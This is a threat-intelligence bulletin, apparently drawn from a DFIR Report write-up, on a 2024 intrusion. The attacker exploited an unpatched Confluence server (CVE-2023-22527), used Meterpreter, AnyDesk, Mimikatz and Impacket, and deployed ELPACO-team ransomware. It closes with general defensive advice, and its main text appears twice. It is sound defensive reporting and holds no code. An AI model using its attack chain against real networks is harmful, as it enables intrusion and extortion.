Another Confluence Bites the Dust: Falling to ELPACO-team Ransomware
Summary:
The intrusion, culminating in the deployment of ELPACO-team ransomware, began in late June 2024, and initial access was achieved through a publicly known template injection vulnerability (CVE-2023-22527) that was exploited on an unpatched Confluence server. The initial exploitation originated from IP address 45.227.254[.]124, which just executed the whoami command and exited. Subsequently, a different IP address leveraged the same vulnerability to deploy a Metasploit payload (Meterpreter), establishing a C2 channel with 91.191.209[.]46 using curl. Notably, the initial attacking IP address that ran whoami later established a direct AnyDesk connection. The threat actor then engaged in short, seemingly exploratory but unmeaningful AnyDesk sessions on the second day of the intrusion before pivoting their focus to privilege escalation on the fourth day. Successful escalation to SYSTEM privileges via an RPCSS variant of named pipe impersonation enabled the creation of a local administrator account and the re-installation of AnyDesk for persistent remote access.
After establishing an alternative means of privileged access as their primary vector for the rest of the intrusion, the attacker then conducted network reconnaissance using SoftPerfect’s NetScan to identify high-value targets and unsuccessfully attempted to exploit Zerologon (CVE-2020-1472) against domain controllers. Credential access was then achieved through the deployment of tools like Mimikatz and Impacket’s Secretsdump, leading to the compromise of a domain administrator account, likely via LSASS dumping due to the use of NTLM hashes during lateral movement. Initiated through compromised domain admin credentials, lateral movement was facilitated using Impacket wmiexec and RDP, and a new SMB share was created on the initially compromised Confluence server to stage more post-exploitation tools. The final phase involved the deployment of ELPACO-team.exe ransomware across multiple servers, approximately 62 hours post-initial compromise, with lateral movement preceding the encryption. A negligible data transfer was observed via AnyDesk traffic, but no significant data exfiltration was detected prior to the ransomware deployment.
Security Officer Comments:
This incident highlights that known critical software vulnerabilities pose a critical risk to unpatched software, as the exploitation of a known Confluence vulnerability served as the initial entry point. The attacker’s approach to this attack appears methodical, starting with reconnaissance and establishing persistence through multiple avenues, including AnyDesk. The unsuccessful Zerologon attempts and the subsequent focus on credential access using well-known tools like Mimikatz and Impacket underscore the attacker's familiarity with common post-exploitation TTPs. The rapid progression from initial compromise to domain administrator access and ultimately the deployment of ransomware on multiple servers, including backup and file servers, within approximately 62 hours, emphasizes the need for robust detection and response solutions. The short, unexplained AnyDesk sessions early in the intrusion potentially warrant further investigation to determine their purpose to determine whether the sessions were deliberate or not. The lack of significant data exfiltration prior to ransomware deployment suggests their primary objective was immense disruption and financial gain through ransomed data, highlighting this intrusion did not result in double extortion. The use of an offshoot of the publicly available ransomware variant, Mimic, further indicates a potentially less sophisticated threat actor, albeit one capable of effectively navigating and compromising a network using readily available tools.
Suggested Corrections:
IOCs are available here.
General Ransomware Suggested Corrections:
Backup your data, system images, and configurations, regularly test them, and keep the backups offline: Ensure that backups are regularly tested and that they are not connected to the business network, as many ransomware variants try to find and encrypt or delete accessible backups. Maintaining current backups offline is critical because if your network data is encrypted with ransomware, your organization can restore systems.
Update and patch systems promptly: This includes maintaining the security of operating systems, applications, and firmware in a timely manner. Consider using a centralized patch management system; use a risk-based assessment strategy to drive your patch management program.
Test your incident response plan: There's nothing that shows the gaps in plans more than testing them. Run through some core questions and use those to build an incident response plan: Are you able to sustain business operations without access to certain systems? For how long? Would you turn off your manufacturing operations if business systems such as billing were offline?
Check your security team's work: Use a 3rd party pen tester to test the security of your systems and your ability to defend against a sophisticated attack. Many ransomware criminals are aggressive and sophisticated and will find the equivalent of unlocked doors.
Segment your networks: There's been a recent shift in ransomware attacks – from stealing data to disrupting operations. It's critically important that your corporate business functions and manufacturing/production operations are separated and that you carefully filter and limit internet access to operational networks, identify links between these networks, and develop workarounds or manual controls to ensure ICS networks can be isolated and continue operating if your corporate network is compromised. Regularly test contingency plans such as manual controls so that safety-critical functions can be maintained during a cyber incident.
Train employees: Email remains the most vulnerable attack vector for organizations. Users should be trained on how to avoid and spot phishing emails.
Implement multi-factor authentication (MFA): External-facing assets that leverage single-factor authentication (SFA) are highly susceptible to brute-forcing attacks, password spraying, or unauthorized remote access using valid (stolen) credentials. Implementing MFA enhances security and adds an extra layer of protection.
Link(s):
https://thedfirreport.com/2025/05/19/another-confluence-bites-the-dust-falling-to-elpaco-team-ransomware/
The intrusion, culminating in the deployment of ELPACO-team ransomware, began in late June 2024, and initial access was achieved through a publicly known template injection vulnerability (CVE-2023-22527) that was exploited on an unpatched Confluence server. The initial exploitation originated from IP address 45.227.254[.]124, which just executed the whoami command and exited. Subsequently, a different IP address leveraged the same vulnerability to deploy a Metasploit payload (Meterpreter), establishing a C2 channel with 91.191.209[.]46 using curl. Notably, the initial attacking IP address that ran whoami later established a direct AnyDesk connection. The threat actor then engaged in short, seemingly exploratory but unmeaningful AnyDesk sessions on the second day of the intrusion before pivoting their focus to privilege escalation on the fourth day. Successful escalation to SYSTEM privileges via an RPCSS variant of named pipe impersonation enabled the creation of a local administrator account and the re-installation of AnyDesk for persistent remote access.
After establishing an alternative means of privileged access as their primary vector for the rest of the intrusion, the attacker then conducted network reconnaissance using SoftPerfect’s NetScan to identify high-value targets and unsuccessfully attempted to exploit Zerologon (CVE-2020-1472) against domain controllers. Credential access was then achieved through the deployment of tools like Mimikatz and Impacket’s Secretsdump, leading to the compromise of a domain administrator account, likely via LSASS dumping due to the use of NTLM hashes during lateral movement. Initiated through compromised domain admin credentials, lateral movement was facilitated using Impacket wmiexec and RDP, and a new SMB share was created on the initially compromised Confluence server to stage more post-exploitation tools. The final phase involved the deployment of ELPACO-team.exe ransomware across multiple servers, approximately 62 hours post-initial compromise, with lateral movement preceding the encryption. A negligible data transfer was observed via AnyDesk traffic, but no significant data exfiltration was detected prior to the ransomware deployment.
Security Officer Comments:
This incident highlights that known critical software vulnerabilities pose a critical risk to unpatched software, as the exploitation of a known Confluence vulnerability served as the initial entry point. The attacker’s approach to this attack appears methodical, starting with reconnaissance and establishing persistence through multiple avenues, including AnyDesk. The unsuccessful Zerologon attempts and the subsequent focus on credential access using well-known tools like Mimikatz and Impacket underscore the attacker's familiarity with common post-exploitation TTPs. The rapid progression from initial compromise to domain administrator access and ultimately the deployment of ransomware on multiple servers, including backup and file servers, within approximately 62 hours, emphasizes the need for robust detection and response solutions. The short, unexplained AnyDesk sessions early in the intrusion potentially warrant further investigation to determine their purpose to determine whether the sessions were deliberate or not. The lack of significant data exfiltration prior to ransomware deployment suggests their primary objective was immense disruption and financial gain through ransomed data, highlighting this intrusion did not result in double extortion. The use of an offshoot of the publicly available ransomware variant, Mimic, further indicates a potentially less sophisticated threat actor, albeit one capable of effectively navigating and compromising a network using readily available tools.
Suggested Corrections:
IOCs are available here.
General Ransomware Suggested Corrections:
Backup your data, system images, and configurations, regularly test them, and keep the backups offline: Ensure that backups are regularly tested and that they are not connected to the business network, as many ransomware variants try to find and encrypt or delete accessible backups. Maintaining current backups offline is critical because if your network data is encrypted with ransomware, your organization can restore systems.
Update and patch systems promptly: This includes maintaining the security of operating systems, applications, and firmware in a timely manner. Consider using a centralized patch management system; use a risk-based assessment strategy to drive your patch management program.
Test your incident response plan: There's nothing that shows the gaps in plans more than testing them. Run through some core questions and use those to build an incident response plan: Are you able to sustain business operations without access to certain systems? For how long? Would you turn off your manufacturing operations if business systems such as billing were offline?
Check your security team's work: Use a 3rd party pen tester to test the security of your systems and your ability to defend against a sophisticated attack. Many ransomware criminals are aggressive and sophisticated and will find the equivalent of unlocked doors.
Segment your networks: There's been a recent shift in ransomware attacks – from stealing data to disrupting operations. It's critically important that your corporate business functions and manufacturing/production operations are separated and that you carefully filter and limit internet access to operational networks, identify links between these networks, and develop workarounds or manual controls to ensure ICS networks can be isolated and continue operating if your corporate network is compromised. Regularly test contingency plans such as manual controls so that safety-critical functions can be maintained during a cyber incident.
Train employees: Email remains the most vulnerable attack vector for organizations. Users should be trained on how to avoid and spot phishing emails.
Implement multi-factor authentication (MFA): External-facing assets that leverage single-factor authentication (SFA) are highly susceptible to brute-forcing attacks, password spraying, or unauthorized remote access using valid (stolen) credentials. Implementing MFA enhances security and adds an extra layer of protection.
Link(s):
https://thedfirreport.com/2025/05/19/another-confluence-bites-the-dust-falling-to-elpaco-team-ransomware/